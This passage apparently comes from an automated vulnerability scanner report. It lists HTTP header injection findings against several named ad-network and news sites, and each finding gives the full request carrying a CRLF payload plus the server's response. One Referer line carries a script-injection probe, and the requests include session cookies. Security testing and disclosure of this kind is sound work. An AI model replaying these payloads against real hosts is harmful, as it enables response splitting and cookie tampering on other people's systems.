Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/82c25
d0abc40537d/interactive.wsj.com/front_nonsub;;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=8;sz=336x280,300x250;ord=8144814481448144;:
Date: Thu, 16 Jun 2011 11:24:11 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.12. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/nbcu.cnbc/home_homeus

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9ae29%0d%0a722f0480e14 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9ae29%0d%0a722f0480e14/nbcu.cnbc/home_homeus;site=cnbc;sect=home;sub=homeus;pageid=15839285;!c=home;!c=homeus;tandomad=none;pm=1;pos=1;tile=1;sz=88x31;ord=582942091860? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9ae29
722f0480e14/nbcu.cnbc/home_homeus;site=cnbc;sect=home;sub=homeus;pageid=15839285;!c=home;!c=homeus;tandomad=none;pm=1;pos=1;tile=1;sz=88x31;ord=582942091860:
Date: Thu, 16 Jun 2011 11:27:13 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.13. http://ad.doubleclick.net/adj/nbcu.cnbc/news_us [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/nbcu.cnbc/news_us

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4eabc%0d%0ab898c22b5c2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4eabc%0d%0ab898c22b5c2/nbcu.cnbc/news_us;site=cnbc;sect=news;sub=us;sub2=rlestate;pageid=43418837;pkid=111;pkid=117;!c=news;!c=us;tandomad=none;pm=1;pos=1;tile=1;sz=88x31;ord=112909254851? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43418837
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/4eabc
b898c22b5c2/nbcu.cnbc/news_us;site=cnbc;sect=news;sub=us;sub2=rlestate;pageid=43418837;pkid=111;pkid=117;!c=news;!c=us;tandomad=none;pm=1;pos=1;tile=1;sz=88x31;ord=112909254851:
Date: Thu, 16 Jun 2011 11:27:24 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.14. http://ad.doubleclick.net/adj/nbcu.cnbc/search [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/nbcu.cnbc/search

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6a34c%0d%0a672eba945fc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6a34c%0d%0a672eba945fc/nbcu.cnbc/search;site=cnbc;sect=search;!c=search;tandomad=none;pm=1;dcopt=ist;pos=2;tile=2;sz=300x250;ord=808273578585? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss3a34b%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E7c5fa54ba36cca68&categories=exclude&searchboxinput=xss
Cookie: id=c60bd0733000097|2703878/1001371/15138,3226301/1106615/15127|t=1297260501|et=730|cs=g_qf15ye; rsi_segs=E11178_10001

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6a34c
672eba945fc/nbcu.cnbc/search;site=cnbc;sect=search;!c=search;tandomad=none;pm=1;dcopt=ist;pos=2;tile=2;sz=300x250;ord=808273578585:
Date: Fri, 17 Jun 2011 10:13:17 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.15. http://ads.cleveland.com/RealMedia/ads/adstream.cap [c parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.cleveland.com
Path:	/RealMedia/ads/adstream.cap

Issue detail

The value of the c request parameter is copied into the Set-Cookie response header. The payload dcfdb%0d%0a855b65252b8 was submitted in the c parameter. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap?c=dcfdb%0d%0a855b65252b8&va=0&e=1s HTTP/1.1
Host: ads.cleveland.com
Proxy-Connection: keep-alive
Referer: http://dis.ny.us.criteo.com/dis/dis.aspx?pu=1108&c=197&cb=46e975b383
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Thu, 16 Jun 2011 13:09:08 GMT
Server: Apache/2.0.52 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: dcfdb
855b65252b8=0; expires=Thu, 16-Jun-11 13:09:09 GMT; path=/; domain=.cleveland.com
Content-Type: text/plain; charset=UTF-8
Location: /RealMedia/ads/Creatives/default/empty.gif
Cneonction: close
Content-Length: 0
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929170045525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 13:19:08 GMT;path=/;httponly

2.16. http://ads.cleveland.com/RealMedia/ads/adstream.cap [va parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.cleveland.com
Path:	/RealMedia/ads/adstream.cap

Issue detail

The value of the va request parameter is copied into the Set-Cookie response header. The payload 79ef9%0d%0a1c69c390e7f was submitted in the va parameter. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap?c=crtg&va=79ef9%0d%0a1c69c390e7f&e=1s HTTP/1.1
Host: ads.cleveland.com
Proxy-Connection: keep-alive
Referer: http://dis.ny.us.criteo.com/dis/dis.aspx?pu=1108&c=197&cb=46e975b383
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Thu, 16 Jun 2011 13:09:34 GMT
Server: Apache/2.0.52 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: crtg=79ef9
1c69c390e7f; expires=Thu, 16-Jun-11 13:09:35 GMT; path=/; domain=.cleveland.com
Content-Type: text/plain; charset=UTF-8
Location: /RealMedia/ads/Creatives/default/empty.gif
nnCoection: close
Content-Length: 0
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929170045525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 13:19:34 GMT;path=/;httponly

2.17. http://ads.nj.com/RealMedia/ads/adstream.cap [c parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.nj.com
Path:	/RealMedia/ads/adstream.cap

Issue detail

The value of the c request parameter is copied into the Set-Cookie response header. The payload 6bee4%0d%0aa3daea546bc was submitted in the c parameter. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap?c=6bee4%0d%0aa3daea546bc&va=0&e=1s HTTP/1.1
Host: ads.nj.com
Proxy-Connection: keep-alive
Referer: http://dis.ny.us.criteo.com/dis/dis.aspx?pu=1108&c=197&cb=46e975b383
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Thu, 16 Jun 2011 13:09:33 GMT
Server: Apache/2.0.52 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: 6bee4
a3daea546bc=0; expires=Thu, 16-Jun-11 13:09:34 GMT; path=/; domain=.nj.com
Content-Type: text/plain; charset=UTF-8
Location: /RealMedia/ads/Creatives/default/empty.gif
nnCoection: close
Content-Length: 0
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929171e45525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 13:19:33 GMT;path=/;httponly

2.18. http://ads.nj.com/RealMedia/ads/adstream.cap [va parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.nj.com
Path:	/RealMedia/ads/adstream.cap

Issue detail

The value of the va request parameter is copied into the Set-Cookie response header. The payload 83c87%0d%0a30a11bfc5db was submitted in the va parameter. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap?c=crtg&va=83c87%0d%0a30a11bfc5db&e=1s HTTP/1.1
Host: ads.nj.com
Proxy-Connection: keep-alive
Referer: http://dis.ny.us.criteo.com/dis/dis.aspx?pu=1108&c=197&cb=46e975b383
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Thu, 16 Jun 2011 13:09:59 GMT
Server: Apache/2.0.52 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: crtg=83c87
30a11bfc5db; expires=Thu, 16-Jun-11 13:10:00 GMT; path=/; domain=.nj.com
Content-Type: text/plain; charset=UTF-8
Location: /RealMedia/ads/Creatives/default/empty.gif
Cneonction: close
Content-Length: 0
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929171e45525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 13:19:59 GMT;path=/;httponly

2.19. http://ads.oregonlive.com/RealMedia/ads/adstream.cap [c parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.oregonlive.com
Path:	/RealMedia/ads/adstream.cap

Issue detail

The value of the c request parameter is copied into the Set-Cookie response header. The payload 2a988%0d%0a9e43732671d was submitted in the c parameter. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap?c=2a988%0d%0a9e43732671d&va=0&e=1s HTTP/1.1
Host: ads.oregonlive.com
Proxy-Connection: keep-alive
Referer: http://dis.ny.us.criteo.com/dis/dis.aspx?pu=1108&c=197&cb=46e975b383
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Thu, 16 Jun 2011 13:09:46 GMT
Server: Apache/2.0.52 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: 2a988
9e43732671d=0; expires=Thu, 16-Jun-11 13:09:47 GMT; path=/; domain=.oregonlive.com
Content-Type: text/plain; charset=UTF-8
Location: /RealMedia/ads/Creatives/default/empty.gif
nnCoection: close
Content-Length: 0
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929171e45525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 13:19:46 GMT;path=/;httponly

2.20. http://ads.oregonlive.com/RealMedia/ads/adstream.cap [va parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.oregonlive.com
Path:	/RealMedia/ads/adstream.cap

Issue detail

The value of the va request parameter is copied into the Set-Cookie response header. The payload afc6d%0d%0a529f13d80d2 was submitted in the va parameter. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap?c=crtg&va=afc6d%0d%0a529f13d80d2&e=1s HTTP/1.1
Host: ads.oregonlive.com
Proxy-Connection: keep-alive
Referer: http://dis.ny.us.criteo.com/dis/dis.aspx?pu=1108&c=197&cb=46e975b383
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Thu, 16 Jun 2011 13:10:12 GMT
Server: Apache/2.0.52 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: crtg=afc6d
529f13d80d2; expires=Thu, 16-Jun-11 13:10:13 GMT; path=/; domain=.oregonlive.com
Content-Type: text/plain; charset=UTF-8
Location: /RealMedia/ads/Creatives/default/empty.gif
Cneonction: close
Content-Length: 0
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929171e45525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 13:20:12 GMT;path=/;httponly

2.21. http://c7.zedo.com/img/bh.gif [a parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/img/bh.gif

Issue detail

The value of the a request parameter is copied into the Set-Cookie response header. The payload c17e4%0d%0a6a4fbda8351 was submitted in the a parameter. This caused a response containing an injected HTTP header.

Request

GET /img/bh.gif?n=305&g=20&a=c17e4%0d%0a6a4fbda8351&s=1&t=i HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_cmagic=359365&dtm_fid=101&dtm_format=5&cli_promo_id=1&dtmc_ver=2&dtm_cid=2339&dtmc_url=http%3A//www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation%3FlangId%3D-1%26storeId%3D10051%26catalogId%3D10053%26Nu%3DP_PARENT_ID%26searchNav%3Dtrue&dtmc_category=Outdoors%3EOutdoor%20Power%20Equipment&dtmc_prop_one=Outdoors%3EOutdoor%20Power%20Equipment&dtmc_prop_two=3bc35c3f-44ee-45ce-a5d3-315a00fe8438&dtmc_page_type=Subcategory&
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411; __qca=P0-1637156077-1305746709690; PI=h478907Za945899Zc305005528,305005528Zs1410Zt1141; FFgeo=2241452; ZEDOIDX=13; FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899:1190,1#751892#675820,2#955819:1219,17#736041,15#736039|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1:0,33,4:1,30,1:0,30,1:0,30,1:0,30,1; FFCap=1595B305,201787:933,196008,139660:1219,217400,217401|0,13,1:0,30,1:0,30,1:0,30,1:0,30,1; ZFFAbh=879B826,20|1477_897#383Z120_879#365

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 45
Content-Type: image/gif
Set-Cookie: FFAbh=897B305,20|165_1#365Zc17e4
6a4fbda8351_1#365;expires=Fri, 15 Jun 2012 11: 29:33 GMT;domain=.zedo.com;path=/;
ETag: "85ecfbee-7054-49420a02cd680"
X-Varnish: 1708187920 1708184115
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=28998
Expires: Thu, 16 Jun 2011 19:32:51 GMT
Date: Thu, 16 Jun 2011 11:29:33 GMT
Connection: close

GIF89a.............!.......,...........D..;

2.22. http://matcher.bidder7.mookie1.com/google [cver parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://matcher.bidder7.mookie1.com
Path:	/google

Issue detail

The value of the cver request parameter is copied into the X-ZAMA-MATCHER-ERROR response header. The payload c1f09%0d%0a5b1c06f975e was submitted in the cver parameter. This caused a response containing an injected HTTP header.

Request

GET /google?id=CAESEFFfAiSla_DJpyyLAGXwDX8&cver=c1f09%0d%0a5b1c06f975e HTTP/1.1
Host: matcher.bidder7.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/B3DM/DLX/1@x71
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QXErgU10I1k; dlx_20100929=set; other_20110126=set; id=2814750682866683; session=1308239531|1308240466; dlx_XXX=set

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 16:08:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-ZAMA-MATCHER-ERROR: google has sent non numeric (or zero) cver 'c1f09
5b1c06f975e'
Cache-Control: no-cache,no-store,private
Pragma: no-cache
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

2.23. http://tacoda.at.atwola.com/rtx/r.gif [N cookie] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tacoda.at.atwola.com
Path:	/rtx/r.gif

Issue detail

The value of the N cookie is copied into the Set-Cookie response header. The payload 74bfe%0d%0a5a8ec25802e was submitted in the N cookie. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.gif?cmd=ESU&si=18201&pi=-&xs=3 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/2939?ret=html&phint=keywords%3Dcredit%20cards%2C%20credit%20card%2C%20credit%2C%20creditcards%2C%20visa%2C%20offers%2C%20search%2C%20compare%2C%20apply%2C%20mastercard%2C%20low%20interest%2C%20student%2C%20instant%20approval%2C%20balance%20transfer%2C%20reward%2C%20business%2C%20student%2C%20cash%20back&phint=__bk_t%3DCredit%20Cards%20-%20Compare%20Credit%20Card%20Offers%20at%20CreditCards.com&phint=__bk_k%3Dcredit%20cards%2C%20credit%20card%2C%20credit%2C%20creditcards%2C%20visa%2C%20offers%2C%20search%2C%20compare%2C%20apply%2C%20mastercard%2C%20low%20interest%2C%20student%2C%20instant%20approval%2C%20balance%20transfer%2C%20reward%2C%20business%2C%20student%2C%20cash%20back&limit=4&r=92667289
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DD6D67B6E651A440C6EAF39F001EBEA; ATTACID=a3Z0aWQ9MTZ0NTFrbzA5NGswa3U=; TData=99999|^|51134|56282|61674|57094|60740|56297|57130|57129|61576|51184|53380|60489|60515|52615|57289|52946|53656|55401|50507|50557|54255|53778|51182|54252|50961|54209|56988|57372|56780|56232|56142|56768|56761|56681|56153; N=2:b1077b952a25f0fd4f2da32539b57495,f09c3ed82a5deedcd5f3f90b36c3d89674bfe%0d%0a5a8ec25802e; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTYyODI6NjE2NzQ6NTcwOTQ6NjA3NDA6NTYyOTc6NTcxMzA6NTcxMjk6NjE1NzY6NTExODQ6NTMzODA6NjA0ODk6NjA1MTU6NTI2MTU6NTcyODk6NTI5NDY6NTM2NTY6NTU0MDE6NTA1MDc6NTA1NTc6NTQyNTU6NTM3Nzg6NTExODI6NTQyNTI6NTA5NjE6NTQyMDk6NTY5ODg6NTczNzI6NTY3ODA6NTYyMzI=

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:41:46 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Fri, 17 Jun 2011 10:56:46 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZ0NTFrbzA5NGswa3U=; path=/; expires=Mon, 11-Jun-12 10:41:46 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=; path=/; expires=Fri, 24-Jun-11 10:41:46 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1308307172^1308309106|18201^1308307172^1308309106; path=/; expires=Fri, 17-Jun-11 11:11:46 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|51134|56282|57094|60740|56297|57130|57129|53380|60489|60515|52615|57289|52946|53656|55401|50557|54255|53778|54252|50961|54209|56681|55467|56969|56835|56780|56232|56673|56768|57372|56761|54208|57288|52947|56153; expires=Mon, 11-Jun-12 10:41:46 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:f09c3ed82a5deedcd5f3f90b36c3d89674bfe
5a8ec25802e,820ce15ad71ebb5ed9e6683b5630c89d; expires=Mon, 11-Jun-12 10:41:46 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTYyODI6NTcwOTQ6NjA3NDA6NTYyOTc6NTcxMzA6NTcxMjk6NTMzODA6NjA0ODk6NjA1MTU6NTI2MTU6NTcyODk6NTI5NDY6NTM2NTY6NTU0MDE6NTA1NTc6NTQyNTU6NTM3Nzg6NTQyNTI6NTA5NjE6NTQyMDk6NTY2ODE6NTU0Njc6NTY5Njk6NTY4MzU6NTY3ODA6NTYyMzI6NTY2NzM6NTY3Njg6NTczNzI=; expires=Mon, 11-Jun-12 10:41:46 GMT; path=/; domain=.at.atwola.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

2.24. http://tacoda.at.atwola.com/rtx/r.gif [si parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tacoda.at.atwola.com
Path:	/rtx/r.gif

Issue detail

The value of the si request parameter is copied into the Set-Cookie response header. The payload 5d8bc%0d%0a5453f722797 was submitted in the si parameter. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.gif?cmd=ESU&si=5d8bc%0d%0a5453f722797&pi=-&xs=3 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/2939?ret=html&phint=keywords%3Dcredit%20cards%2C%20credit%20card%2C%20credit%2C%20creditcards%2C%20visa%2C%20offers%2C%20search%2C%20compare%2C%20apply%2C%20mastercard%2C%20low%20interest%2C%20student%2C%20instant%20approval%2C%20balance%20transfer%2C%20reward%2C%20business%2C%20student%2C%20cash%20back&phint=__bk_t%3DCredit%20Cards%20-%20Compare%20Credit%20Card%20Offers%20at%20CreditCards.com&phint=__bk_k%3Dcredit%20cards%2C%20credit%20card%2C%20credit%2C%20creditcards%2C%20visa%2C%20offers%2C%20search%2C%20compare%2C%20apply%2C%20mastercard%2C%20low%20interest%2C%20student%2C%20instant%20approval%2C%20balance%20transfer%2C%20reward%2C%20business%2C%20student%2C%20cash%20back&limit=4&r=92667289
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DD6D67B6E651A440C6EAF39F001EBEA; ATTACID=a3Z0aWQ9MTZ0NTFrbzA5NGswa3U=; TData=99999|^|51134|56282|61674|57094|60740|56297|57130|57129|61576|51184|53380|60489|60515|52615|57289|52946|53656|55401|50507|50557|54255|53778|51182|54252|50961|54209|56988|57372|56780|56232|56142|56768|56761|56681|56153; N=2:b1077b952a25f0fd4f2da32539b57495,f09c3ed82a5deedcd5f3f90b36c3d896; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTYyODI6NjE2NzQ6NTcwOTQ6NjA3NDA6NTYyOTc6NTcxMzA6NTcxMjk6NjE1NzY6NTExODQ6NTMzODA6NjA0ODk6NjA1MTU6NTI2MTU6NTcyODk6NTI5NDY6NTM2NTY6NTU0MDE6NTA1MDc6NTA1NTc6NTQyNTU6NTM3Nzg6NTExODI6NTQyNTI6NTA5NjE6NTQyMDk6NTY5ODg6NTczNzI6NTY3ODA6NTYyMzI=

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:40:16 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Fri, 17 Jun 2011 10:55:16 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZ0NTFrbzA5NGswa3U=; path=/; expires=Mon, 11-Jun-12 10:40:16 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=; path=/; expires=Fri, 24-Jun-11 10:40:16 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1308307172^1308309016|18201^1308307172^1308308972|5d8bc
5453f722797^1308307216^1308309016; path=/; expires=Fri, 17-Jun-11 11:10:16 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|51134|56282|57094|60740|56297|57130|57129|53380|60489|60515|52615|57289|52946|53656|55401|50557|54255|53778|54252|50961|54209|56681|55467|56969|56835|56780|56232|56673|56768|57372|56761|54208|57288|52947|56153; expires=Mon, 11-Jun-12 10:40:16 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:f09c3ed82a5deedcd5f3f90b36c3d896,820ce15ad71ebb5ed9e6683b5630c89d; expires=Mon, 11-Jun-12 10:40:16 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTYyODI6NTcwOTQ6NjA3NDA6NTYyOTc6NTcxMzA6NTcxMjk6NTMzODA6NjA0ODk6NjA1MTU6NTI2MTU6NTcyODk6NTI5NDY6NTM2NTY6NTU0MDE6NTA1NTc6NTQyNTU6NTM3Nzg6NTQyNTI6NTA5NjE6NTQyMDk6NTY2ODE6NTU0Njc6NTY5Njk6NTY4MzU6NTY3ODA6NTYyMzI6NTY2NzM6NTY3Njg6NTczNzI=; expires=Mon, 11-Jun-12 10:40:16 GMT; path=/; domain=.at.atwola.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

2.25. http://www.wunderground.com/dotset.php [id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wunderground.com
Path:	/dotset.php

Issue detail

The value of the id request parameter is copied into the Set-Cookie response header. The payload 18847%0d%0a994f5b20968 was submitted in the id parameter. This caused a response containing an injected HTTP header.

Request

GET /dotset.php?id=18847%0d%0a994f5b20968&t=1 HTTP/1.1
Host: www.wunderground.com
Proxy-Connection: keep-alive
